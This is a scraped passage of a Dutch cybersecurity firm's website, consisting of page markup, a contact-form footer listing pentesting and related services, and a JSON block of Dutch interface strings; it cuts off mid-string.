tabindex="0"><div class="w-5 h-5 mt-[3px] shrink-0 fxc relative"><div class="absolute inset-0 rounded-md border-[#D9D9D9] border duration-200 group-focus:scale-110 group-hover:scale-[1.2] group-focus:border-dark-lave group-hover:border-dark-lave"></div><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" class="duration-100 opacity-0 scale-75" height="14" width="14" xmlns="http://www.w3.org/2000/svg"><path d="M12.736 3.97a.733.733 0 0 1 1.047 0c.286.289.29.756.01 1.05L7.88 12.01a.733.733 0 0 1-1.065.02L3.217 8.384a.757.757 0 0 1 0-1.06.733.733 0 0 1 1.047 0l3.052 3.093 5.4-6.425z"></path></svg></div><div class="text-sm lg:text-base text-zinc-700 leading-relaxed"><div class="text-[#383240] prose-a:underline prose-a:font-medium leading-relaxed"><p>Ik heb de WebSec <a href="/juridisch/algemene-voorwaarden">Algemene Voorwaarden</a> en <a href="/juridisch/privacybeleid">Privacybeleid</a> gelezen en ga er mee akkoord.</p>
</div></div><input name="agreeToTos" type="checkbox" class="hidden" value=""></label></div></div></div><button type="submit" class="min-w-fit font-semibold rounded-full fxc overflow-hidden relative no-underline gap-2 duration-150 shadow outline-none active:ring-0 focus:ring-2 active:scale-[0.97] hover:opacity-85 text-white bg-gradient-to-br from-sig-red to-sig-red/80 ring-sig-red/50 border-sig-red px-8 h-14 w-56 my-6">Verstuur</button></fieldset></form><div class="max-w-lg grow rounded-ten overflow-hidden lg:block hidden bg-gray-50"><div class="h-full w-full"></div></div></section><div class="bg-[#0E041D] text-[#D6D2DB] sticky top-full"><div class="w-full max-w-7xl mx-auto px-5 font-pop"><footer class="footer py-16 sm:py-20 sm:pb-24 leading-loose"><div class="max-w-sm space-y-4"><strong class="text-xl">Over WebSec®</strong><p>WebSec is een professioneel cybersecuritybedrijf dat een reeks beveiligingsdiensten aanbiedt voor bedrijven van elke omvang met als doel uw cyberbeveiliging weerbaarder te maken tegen de modernste cyberdreigingen en tegelijkertijd uiterst kosteneffectief, flexibel en van hoge kwaliteit te blijven.</p><div class="text-xl flex gap-x-3 items-center"><a aria-label="twitter share link" href="https://twitter.com/websecnl"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 1024 1024" height="22" width="22" xmlns="http://www.w3.org/2000/svg"><path d="M512 64C264.6 64 64 264.6 64 512s200.6 448 448 448 448-200.6 448-448S759.4 64 512 64zm215.3 337.7c.3 4.7.3 9.6.3 14.4 0 146.8-111.8 315.9-316.1 315.9-63 0-121.4-18.3-170.6-49.8 9 1 17.6 1.4 26.8 1.4 52 0 99.8-17.6 137.9-47.4-48.8-1-89.8-33-103.8-77 17.1 2.5 32.5 2.5 50.1-2a111 111 0 0 1-88.9-109v-1.4c14.7 8.3 32 13.4 50.1 14.1a111.13 111.13 0 0 1-49.5-92.4c0-20.7 5.4-39.6 15.1-56a315.28 315.28 0 0 0 229 116.1C492 353.1 548.4 292 616.2 292c32 0 60.8 13.4 81.1 35 25.1-4.7 49.1-14.1 70.5-26.7-8.3 25.7-25.7 47.4-48.8 61.1 22.4-2.4 44-8.6 64-17.3-15.1 22.2-34 41.9-55.7 57.6z"></path></svg></a><a aria-label="facebook share link" href="https://www.facebook.com/websec"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M504 256C504 119 393 8 256 8S8 119 8 256c0 123.78 90.69 226.38 209.25 245V327.69h-63V256h63v-54.64c0-62.15 37-96.48 93.67-96.48 27.14 0 55.52 4.84 55.52 4.84v61h-31.28c-30.8 0-40.41 19.12-40.41 38.73V256h68.78l-11 71.69h-57.78V501C413.31 482.38 504 379.78 504 256z"></path></svg></a><a aria-label="github share link" href="https://github.com/websecnl"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 496 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6zm-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3zm44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9zM244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8zM97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1zm-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7zm32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1zm-11.4-14.7c-1.6 1-1.6 3.6 0 5.9 1.6 2.3 4.3 3.3 5.6 2.3 1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2z"></path></svg></a><a aria-label="linkedin share link" href="https://www.linkedin.com/company/14826551/"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 448 512" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M100.28 448H7.4V148.9h92.88zM53.79 108.1C24.09 108.1 0 83.5 0 53.8a53.79 53.79 0 0 1 107.58 0c0 29.7-24.1 54.3-53.79 54.3zM447.9 448h-92.68V302.4c0-34.7-.7-79.2-48.29-79.2-48.29 0-55.69 37.7-55.69 76.7V448h-92.78V148.9h89.08v40.8h1.3c12.4-23.5 42.69-48.3 87.88-48.3 94 0 111.28 61.9 111.28 142.3V448z"></path></svg></a><a aria-label="youtube share link" href="https://www.youtube.com/channel/UCdesD67XUshGeC_kdy0Z9-A"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 576 512" height="23" width="23" xmlns="http://www.w3.org/2000/svg"><path d="M549.655 124.083c-6.281-23.65-24.787-42.276-48.284-48.597C458.781 64 288 64 288 64S117.22 64 74.629 75.486c-23.497 6.322-42.003 24.947-48.284 48.597-11.412 42.867-11.412 132.305-11.412 132.305s0 89.438 11.412 132.305c6.281 23.65 24.787 41.5 48.284 47.821C117.22 448 288 448 288 448s170.78 0 213.371-11.486c23.497-6.321 42.003-24.171 48.284-47.821 11.412-42.867 11.412-132.305 11.412-132.305s0-89.438-11.412-132.305zm-317.51 213.508V175.185l142.739 81.205-142.739 81.201z"></path></svg></a></div><a class="relative size-14 grayscale-[96%] border-2 border-gray-400 rounded-full" aria-label="link naar dekra ccv keurmerk" href="https://hetccv.nl/bedrijven/websec-b-v/" target="_blank"><img alt="dekra ccv certificaat foto" loading="lazy" decoding="async" data-nimg="fill" class="object-contain" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="70px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=16&amp;q=75 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=32&amp;q=75 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=48&amp;q=75 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=60&amp;q=75 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=64&amp;q=75 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=96&amp;q=75 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=120&amp;q=75 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=128&amp;q=75 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=220&amp;q=75 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=256&amp;q=75 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=360&amp;q=75 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=384&amp;q=75 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=425&amp;q=75 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=480&amp;q=75 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=640&amp;q=75 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=750&amp;q=75 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=828&amp;q=75 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=1080&amp;q=75 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=1111&amp;q=75 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=1200&amp;q=75 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=1400&amp;q=75 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdekra-ccv-seal-round.9e1043b4.png&amp;w=1400&amp;q=75"></a></div><div><span class="font-bold">Contacts</span><div class="flex items-center gap-x-3"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" d="M1.885.511a1.745 1.745 0 0 1 2.61.163L6.29 2.98c.329.423.445.974.315 1.494l-.547 2.19a.68.68 0 0 0 .178.643l2.457 2.457a.68.68 0 0 0 .644.178l2.189-.547a1.75 1.75 0 0 1 1.494.315l2.306 1.794c.829.645.905 1.87.163 2.611l-1.034 1.034c-.74.74-1.846 1.065-2.877.702a18.6 18.6 0 0 1-7.01-4.42 18.6 18.6 0 0 1-4.42-7.009c-.362-1.03-.037-2.137.703-2.877z"></path></svg> <span>+31 (0) 85-0023061</span></div><div class="flex items-center gap-x-3"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 512 512" height="16" width="16" xmlns="http://www.w3.org/2000/svg"><path d="M437.332 80H74.668C51.199 80 32 99.198 32 122.667v266.666C32 412.802 51.199 432 74.668 432h362.664C460.801 432 480 412.802 480 389.333V122.667C480 99.198 460.801 80 437.332 80zM432 170.667L256 288 80 170.667V128l176 117.333L432 128v42.667z"></path></svg> <span>[email protected]</span></div><span class="font-bold mt-7">Location</span><div class="grid grid-rows-[auto,auto] grid-cols-[auto,auto] items-center gap-x-2"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 384 512" height="15" width="15" xmlns="http://www.w3.org/2000/svg"><path d="M215.7 499.2C267 435 384 279.4 384 192C384 86 298 0 192 0S0 86 0 192c0 87.4 117 243 168.3 307.2c12.3 15.3 35.1 15.3 47.4 0zM192 128a64 64 0 1 1 0 128 64 64 0 1 1 0-128z"></path></svg> <strong>Netherlands</strong><p class="col-start-2 col-span-1">Keurenplein 41, UNIT A6260 <br> 1069 CD, Amsterdam</p></div><div class="grid grid-rows-[auto,auto] grid-cols-[auto,auto] items-center gap-x-2"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 384 512" height="15" width="15" xmlns="http://www.w3.org/2000/svg"><path d="M215.7 499.2C267 435 384 279.4 384 192C384 86 298 0 192 0S0 86 0 192c0 87.4 117 243 168.3 307.2c12.3 15.3 35.1 15.3 47.4 0zM192 128a64 64 0 1 1 0 128 64 64 0 1 1 0-128z"></path></svg> <strong>United States</strong><p class="col-start-2 col-span-1">1021 E Lincolnway Suite #6400, Cheyenne <br> Wyoming 82001, United States</p></div></div><div><span class="font-bold">Navigate</span><a class="link link-hover" href="https://websec.nl/blog">Blog</a><a class="link link-hover" href="https://websec.nl/careers">Vacatures</a><a class="link link-hover" href="https://websec.nl/vapt-certificaat-validatie">VAPT Validatie Tool</a><a class="link link-hover" href="https://websec.nl/scanner">Virusscanner Tool</a><a class="link link-hover" href="https://websec.nl/aanvragen">Aanvragen</a></div><div><span class="font-bold">Solutions &amp; Services</span><a class="link link-hover" href="https://websec.nl/diensten/pentest">Pentesten</a><a class="link link-hover" href="https://websec.nl/diensten/red-teaming">Red Teaming</a><a class="link link-hover" href="https://websec.nl/diensten/cvd-programma">CVD Programma</a><a class="link link-hover" href="https://websec.nl/diensten/security-staffing">Security Staffing</a><a class="link link-hover" href="https://websec.nl/diensten/phishing-simulatie">Phishing Simulatie</a><a class="link link-hover" href="https://websec.nl/diensten/security-abonnementen">Security Abonnementen</a></div></footer><footer class="footer flex items-center gap-5 flex-wrap gap-x-10  py-7 border-t border-gray-500/50"><div class="flex items-center space-x-1 text-lg"><svg xmlns="http://www.w3.org/2000/svg" fill="#FFFFFF" viewBox="0 0 539 512" width="30" height="28"><path d="M467.59 265.59 349.67 424.77l-46.46-62.71-33.7-45.5-83.1-112.17a128.03 128.03 0 0 1-25-75.69V54.17h216.17v74.53a127.86 127.86 0 0 1-24.97 75.69l-60.8 82.01a10.23 10.23 0 0 0 0 12.14l24.8 33.38a5.57 5.57 0 0 0 8.97 0l70.58-95.29A182.5 182.5 0 0 0 431.8 128.7V6.33A6.33 6.33 0 0 0 425.46 0H113.61a6.33 6.33 0 0 0-6.33 6.33v122.34a182.5 182.5 0 0 0 35.63 107.93L235.83 362l-46.44 62.7L71.42 265.59a31.88 31.88 0 0 0-25.58-12.88H5.54a5.58 5.58 0 0 0-4.48 8.86l183.82 248.18a5.56 5.56 0 0 0 8.96 0l57.82-78.08 8.86-12.02 8.94-12.07 75.69 102.17a5.57 5.57 0 0 0 8.95 0L537.88 261.6a5.6 5.6 0 0 0-4.48-8.87h-40.23a31.83 31.83 0 0 0-25.58 12.86"></path></svg><strong class="font-semibold">WebSec®</strong></div><p class="mr-auto">2024<!-- --> © <!-- -->Alle rechten voorbehouden</p><div class=" flex gap-x-5 flex-wrap "><a class="link link-hover min-w-[45%] sm:min-w-0 p-1" href="https://websec.nl/juridisch/privacybeleid">Privacybeleid</a><a class="link link-hover min-w-[45%] sm:min-w-0 p-1" href="https://websec.nl/juridisch/algemene-voorwaarden">Algemene Voorwaarden</a><a class="link link-hover min-w-[45%] sm:min-w-0 p-1" rel="nofollow noopener noreferrer" href="https://websec.nl/juridisch/klachtenbeleid">Klachtenbeleid</a><a class="link link-hover min-w-[45%] sm:min-w-0 p-1" href="https://websec.nl/responsible-disclosure">Responsible Disclosure</a></div></footer></div></div></main></div></div></div><script id="__NEXT_DATA__" type="application/json" nonce="">{"props":{"ctx":{"pageProps":{}},"cspNonce":"SIDU0S-mqoI9C-gvnl-7I","__lang":"nl","__namespaces":{"common":{"404":{"title":"Pagina niet gevonden","summary":"De pagina die u zoekt kon niet worden gevonden.","back to home":"Terug naar Home"},"all rights reserved":"Alle rechten voorbehouden","our experts will help":"Onze experts zullen u helpen!","ready to work?":"Klaar om met Websec te werken? Nu Aanvragen","ready to work desc":"Klaar om uw cyberbeveiliging te verbeteren met WebSec? Zet de eerste stap naar versterkte bescherming. Informeer nu en beveilig uw digitale activa met onze vertrouwde expertise.","explore solutions":"Onze Diensten","about us":"Over Ons","know more":"Meer Weten","inquire":"Aanvragen","inquire now":"Nu Aanvragen","get consultation":"Boek uw Adviesgesprek","read more":"Lees Meer","get in touch":"Neem Contact Op","submit complaint":"Klacht Melden","send":"Verstuur","sent":"Verstuurd!","sending":"Versturen","about":"Over","learn about":"Leer over","view services":"Bekijk alle diensten","read article":"Lees Artikel","dutch":"Nederlands","step":"Stap","article langs available":"Beschikbare talen","dekra seal":{"link text":"link naar dekra ccv keurmerk","img text":"dekra ccv certificaat foto"},"contact":{"title":"Contact","description":"Wij bieden superieure IT-beveiligingsdiensten door werk van onverslaanbare kwaliteit. Neem vandaag nog contact met ons op!"},"incident modal":{"button":"24/7 Incidentrespons","title":"\u003cp\u003eOnder een Cyberaanval? \u003cstrong\u003eBel ons nu!\u003c/strong\u003e\u003c/p\u003e\n","subtitle":"24/7 beschikbaar om te handelen. We zijn op locatie binnen enkele uren.","note":"\u003cp\u003e\u003cstrong\u003eOpmerking\u003c/strong\u003e: Onmiddellijke incidentresponsdienst is momenteel alleen beschikbaar in \u003cstrong\u003eNederland\u003c/strong\u003e\u003c/p\u003e\n","others":{"title":"Op zoek naar andere beveiligingsdiensten?","subtitle":"Ontdek onze beveiligingsdiensten of informeer om een afspraak met ons te plannen.","explore services":"Onze Diensten","inquire now":"Nu Aanvragen"}},"filepond":{"idle":"Plaats uw bestanden hier of \u003cspan class=\"filepond--label-action\"\u003eBlader door bestanden.\u003c/span\u003e","invalidField":"Veld bevat ongeldige bestanden","loadError":"Fout tijdens laden","processing":"Uploaden","complete":"Upload Voltooid","aborted":"Upload Geannuleerd","processError":"Fout tijdens uploaden","revertError":"Fout tijdens terugdraaien","removeError":"Fout tijdens verwijderen","tapToCancel":"tik om te annuleren","tapToRetry":"tik om opnieuw te proberen","tapToUndo":"tik om ongedaan te maken","Remove":"Verwijder","Abort":"Afbreken","Cancel":"Annuleren","Undo":"Ongedaan Maken","Retry":"Opnieuw Proberen","Upload":"Uploaden"},"other sectors we secure":"Andere sectoren die we beveiligen","sectors":{"public":"Publieke \u0026 Overheidssector","healthcare":"Gezondheidszorg","financial":"Financiële","retail":"Groothandel \u0026 Detailhandel","energy":"Energiesector","transport":"Transport","industrial":"Industriële"},"footer":{"title":"Over WebSec®","description":"WebSec is een professioneel cybersecuritybedrijf dat een reeks beveiligingsdiensten aanbiedt voor bedrijven van elke omvang met als doel uw cyberbeveiliging weerbaarder te maken tegen de modernste cyberdreigingen en tegelijkertijd uiterst kosteneffectief, flexibel en van hoge kwaliteit te blijven."},"pageLinkTexts":{"home":"Home","inquire":"Aanvragen","intake form":"Intake Form","about us":"Over Ons","partners":"Partners","services":"Diensten","pentesting":"Pentesten","incident response":"Incident Response","nis2 pentest":"NIS2 Pentest","iso-27001 pentest":"ISO 27001 pentest","cloud security":"Cloud Beveiliging","code review":"Code Review","detection engineering":"Detection Engineering","cvd program":"CVD Programma","coronacheck app pentest":"CoronaCheck-App Pentest","digid pentest":"DigiD Pentest","ics/scada pentest":"ICS/SCADA Pentest","infrastructure pentest":"Infrastructuur Pentest","mobile application pentest":"Mobiele Applicatie Pentest","mystery guest":"Mystery Guest","pci-dss audit":"PCI-DSS Pentest","phishing campaign":"Phishing Simulatie","red teaming":"Red Teaming","web application pentest":"Web Applicatie Pentest","wireless networking pentest":"WiFi Netwerk Pentest","security awareness training":"Security Bewustzijnstraining","iot/embedded device pentest":"IoT Systems Pentest","pricing":"Prijzen","security subscriptions":"Security Abonnementen","security staffing":"Security Staffing","page not found":"Pagina niet gevonden","cybersecurity for energy sector":"Cybersecurity voor de Energiesector","industrial sector":"Industriële Sector","public \u0026 government sector":"Publieke \u0026 Overheidssector","retail sector":"Detailhandel Sector","financial \u0026 banking sector":"Financiële \u0026 Bankensector","transport sector":"Transportsector","healthcare sector":"Gezondheidszorgsector","privacy policy":"Privacybeleid","complaints policy":"Klachtenbeleid","terms and conditions":"Algemene Voorwaarden","information-security policy":"Informatiebeveiligingsbeleid","responsible disclosure":"Responsible Disclosure","blog":"Blog","vacancies":"Vacatures","malware scanner":"Virusscanner Tool","submit vulnerability report":"Meld een Kwetsbaarheid","contact us":"Contact","downloads":"Downloads","vapt validation":"VAPT Validatie Tool","embed badge":"Integreer Websec Badge","sectors":"Sectoren","company":"Bedrijf","solutions":"Diensten","resources":"Resources","penetration testing":"Penetratietests","monitoring \u0026 forensics":"Monitoring \u0026 Forensics","security trainings":"Security Trainings","continued testing":"Doorlopende Tests","security assessments":"Security Assessments","social engineering":"Social Engineering","compliance":"Compliance","outsourcing":"Detachering","schedule consultation":"Consult Inplanen","schedule call":"Afspraak Inplannen","find me a contract":"Vind mij een opdracht","submit complaint":"Dien een Klacht in"},"ccv pentest":{"title":"Hoogste Kwaliteit Pentesting","description":"WebSec is toegewijd aan het handhaven van de normen van het CCV-Pentesting Trustseal, een getuigenis van onze toewijding aan uitmuntendheid in cybersecurity:\n","features":["\u003cp\u003e\u003cstrong\u003eCCV Standaard Compliance:\u003c/strong\u003e Onze penetratietesten voldoen rigoureus aan de strenge eisen van de CCV voor uitgebreide beveiligingsevaluaties.\u003c/p\u003e\n","\u003cp\u003e\u003cstrong\u003eNorm-Conforme Documentatie:\u003c/strong\u003e Elke test wordt zorgvuldig gedocumenteerd, volgens de CCV-normen voor transparantie en precisie.\u003c/p\u003e\n","\u003cp\u003e\u003cstrong\u003eGegarandeerde Kwaliteitstesten:\u003c/strong\u003e Klanten zijn verzekerd van het ontvangen van toptier penetratietestdiensten, gevalideerd door onze naleving van CCV-normen.\u003c/p\u003e\n","\u003cp\u003e\u003cstrong\u003eExpert Team met OSCP Certificering:\u003c/strong\u003e Elke beveiligingsspecialist in ons team heeft een OSCP-certificering, wat zorgt voor gelaagdheid en expertise in onze testprocessen.\u003c/p\u003e\n"]},"labels":{"firstname":"Voornaam","lastname":"Achternaam","fullname":"Volledige Naam","email":"Email Adres","phone":"Telefoonnummer","company name":"Bedrijfsnaam","company url":"Uw Website","company position":"Uw positie in het bedrijf","company address":"Bedrijfsadres","coc number":"KvK-nummer","number of employees":"Aantal Medewerkers","inquire title":"Aanvraag Naam","inquire detail":"Inquire Details","yes":"Yes","no":"Niet","street":"Straatnaam","city":"Stad","zip":"Postcode","country":"Land"},"placeholders":{"phone":"+31 (0) 85 1234567","email":"[email protected]","contact message":"Hoe kunnen wij helpen?"},"contact by phone?":"Wilt u telefonisch gecontacteerd worden?","sub to newsletter":"Meld u aan voor onze nieuwsbrief","agree to tos":"\u003cp\u003eIk heb de WebSec \u003ca href=\"/juridisch/algemene-voorwaarden\"\u003eAlgemene Voorwaarden\u003c/a\u003e en \u003ca href=\"/juridisch/privacybeleid\"\u003ePrivacybeleid\u003c/a\u003e gelezen en ga er mee akkoord.\u003c/p\u003e\n","thankyou":{"title":"Dank u","description":"Een vertegenwoordiger zal binnenkort contact met u opnemen over uw aanvraag."},"certification":{"title":"VAPT Validatie Tool","description":"Controleer de geldigheid van een door Websec uitgegeven certificaat.","content":{"title":"Stroomlijn uw beveiliging met een VAPT Certificering door WebSec","description":"\u003cp\u003eOnze experts testen zorgvuldig de bedrijfsmiddelen van uw bedrijf, waardoor u niet alleen wordt beschermd tegen huidige cyberdreigingen, maar ook tegen toekomstige. Met de steun van onze medewerkers en klanten omarmen we de uitdagingen van het informatietijdperk.\u003c/p\u003e\n\u003cp\u003eNadat onze ingenieurs hebben geverifieerd dat u de ontdekte kwetsbaarheden hebt verholpen, geven we een safe-to-host certificaat uit. Verkrijg een beveiligingsaudit en beveilig uw applicaties.\u003c/p\u003e\n"},"form":{"check btn":"Geldigheid controleren","input label":"Voer uw Certificaat ID in"},"states":{"notfound":"\u003cp\u003eCERTIFICAAT NR. \u003cem\u003evapt_id\u003c/em\u003e NIET GEVONDEN.\u003c/p\u003e\n","certno":"CERTIFICAAT NR."},"results":{"title":"Titel","issued date":"Uitgiftedatum","issued to":"Uitgegeven aan","company kvk":"Bedrijfs KVK","expiry":"Verloopdatum","status":"Status","description":"Omschrijving","download":"downloaden","suspended":"Opgeschort","cert suspended":"Opgeschort","cert expired":"Certificaat Verlopen","cert valid":"Geldig \u0026 Actief","no description":"Geen aanvullende informatie toegevoegd.","download as pdf":"download als pdf"},"badge section":{"title":"Beveiligd door WebSec Badge","description":"\u003cp\u003eBeveilig je infrastructuur en laat het zien op je website.\u003cbr\u003eDe WebSec badge verhoogt het vertrouwen, de veiligheid en het vertrouwen onder je klanten!\u003c/p\u003e\n"}},"scanner":{"title":"Scan bestand op malware","description":"Zowel WebSec als de API Provider slaat uw bestanden niet op. Op dit moment kan de  scanner de detectiestatus van bijna 40 verschillende antivirus scanners tonen.","about":{"title":"Over de scanner","description":"\u003cp\u003eWe gebruiken een betaalde API. Onze service wordt gedreven door enthousiasme, we stellen ons geen doel om te verdienen hiermee. U kunt andere gratis alternatieven gebruiken, maar wij gebruiken een API van een betrouwbare aanbieder \u0026#39;KleenScan\u0026#39;.\u003c/p\u003e\n\u003cp\u003eDit is nuttig voor ontwikkelaars omdat het niet zal resulteren in detecties van uw software, in tegenstelling tot de meeste scanners zal deze API de geüploade bestanden nooit verspreiden.\u003c/p\u003e\n\u003cp\u003eOp dit moment kan de WebSec scanner de detectiestatus van bijna 40 verschillende antivirus scanners tonen:\u003c/p\u003e\n"},"status":"Status","detection":"Detectie","scan status":"Scanstatus","scan results":"Scanresultaten","scan id":"Scan-ID","scanned":"Gescand","scanning":"Aan het Scannen","pending":"In Afwachting","detected":"Gedetecteerd","clean":"Schoon","complete":"Voltooid","in progress":"Bezig","max size":"Maximale bestandsgrootte is 20mb.","getting file ready":"Uw bestand wordt voorbereid voor de scan, een ogenblik geduld alstublieft...","ops":"Oeps!","something wrong":"Er is iets onverwachts gebeurd, stuur ons een e-mail met een uitleg en screenshot en dan zullen wij proberen dit voor u op te lossen.","form":{"notification label":"Meld mij wanneer voltooid.","submit":"Indienen","submitted":"Ingediend","submitting":"Indienen"}},"schedule consultation":{"title":"Boek uw Adviesgesprek","description":"\u003cp\u003ePlan een vrijblijvende sessie van 30 minuten met een van onze ervaren cybersecurity-experts. Deze sessie biedt u de perfecte gelegenheid om uw beveiligingsbehoeften te bespreken en vragen te stellen. Mocht u specifiek geïnteresseerd zijn in onze diensten of een offerte willen aanvragen, dan nodigen wij u vriendelijk uit om het \u003ca href=\"/aanvragen\"\u003eaanvraagformulier\u003c/a\u003e te gebruiken. Wij staan klaar om u te ondersteunen met deskundig advies op maat.\u003c/p\u003e\n"}},"home":{"title":"\u003cp\u003eUw \u003cstrong\u003e{Cybersecurity}\u003c/strong\u003e\u003cbr\u003eSpecialist\u003c/p\u003e\n","description":"Geen dreiging is te groot of te klein voor ons. Bij WebSec zetten we geavanceerde cybersecurity-oplossingen in om uw onderneming te beschermen, klaar voor de uitdagingen van zowel vandaag als morgen. Laat WebSec u helpen.","meta":{"title":"Websec | Uw Cybersecurity Specialist"},"sectors":[{"id":"publicSector","name":"Openbaar","title":"Cyberbeveiliging in de Publieke Sector","summary":"Een op maat gemaakte reeks oplossingen ontworpen om overheidsystemen te beschermen, waarbij de integriteit, veiligheid en dienstcontinuïteit tegen cyberdreigingen gewaarborgd wordt."},{"id":"healthcareSector","name":"Gezondheidszorg","title":"Cyberbeveiliging in de Gezondheidszorg","summary":"Een speciaal pakket diensten gericht op het beschermen van patiëntgegevens en essentiële gezondheidssystemen tegen cyberaanvallen, waarbij vertrouwelijkheid, integriteit en beschikbaarheid wordt gewaarborgd."},{"id":"financialSector","name":"Financieel","title":"Financiële Cyberbeveiliging","summary":"Op maat gemaakte cyberbeveiligingsmaatregelen gericht op het beschermen van financiële instellingen tegen cyberdreigingen, waarbij klantgegevens en financiële activa worden beschermd en regelgevende naleving wordt gewaarborgd."},{"id":"industrialSector","name":"Industrieel","title":"Industriële Cyberbeveiliging","summary":"Gespecialiseerde diensten gericht op het versterken van industriële besturingssystemen tegen cyberaanvallen, waarbij de integriteit van de infrastructuur, productiecontinuïteit en veiligheidsnormen worden beschermd."},{"id":"energySector","name":"Energie","title":"Cyberbeveiliging in de Energiesector","summary":"Beveiligingsoplossingen gericht op het beschermen van de kritieke infrastructuur van de energiesector tegen cyberdreigingen, waarbij operationele stabiliteit en bescherming van gevoelige gegevens wordt gewaarborgd."},{"id":"transportSector","name":"Transport","title":"Cyberbeveiliging in de Transportsector","summary":"Een reeks cyberbeveiligingsmaatregelen ontworpen om transportsystemen te beveiligen, waarbij kritieke gegevens worden beschermd en de soepele werking en veiligheid van transportdiensten wordt gewaarborgd."},{"id":"retailSector","name":"Detailhandel","title":"Cyberbeveiliging in de 